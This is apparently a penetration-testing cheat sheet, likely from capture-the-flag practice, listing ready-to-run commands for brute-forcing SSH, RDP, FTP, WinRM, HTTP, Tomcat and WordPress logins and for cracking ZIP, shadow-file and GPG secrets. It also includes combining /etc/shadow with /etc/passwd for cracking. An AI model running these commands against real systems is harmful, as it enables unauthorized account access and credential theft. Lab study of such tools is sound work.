
Bruteforce

Medusa

medusa -h <IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin

Tomcat GET:

hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt http-get://<IP>:8080/manager/html

RDP:

crowbar -b rdp -s <IP> -u <admin> -C rockyou.txt -n 1

Evil-winrm:

crackmapexec winrm <IP> -d <domain> -u users.txt -p password.txt

SSH:

hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP> -s <port>
hydra -l <user> -P /usr/share/wordlists/metasploit/unix_passwords.txt <IP> ssh -t 4 -V

HTTP-GET

hydra -l <user> -P /usr/share/wordlists/rockyou.txt http-get://<IP>

HTTP-POST

hydra <IP> http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f

FTP

hydra -l <user> -P /usr/share/wordlists/rockyou.txt -vV <IP> ftp

ZIP

fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt secrets.zip

Unshadow

/etc/shadow + /etc/passwd
# Grab both files, then run the following command
unshadow <passwd file> <shadow file> > unshadowed.txt

WordPress

wpscan --url <IP> -U users.txt -P pass.txt
wpscan --url http://test.com/

ASC

gpg2john tryhackme.asc > hash
john hash -w=/usr/share/wordlists/rockyou.txt
gpg --import tryhackme.asc # Enter the passphrase
gpg --decrypt credentials.pgp
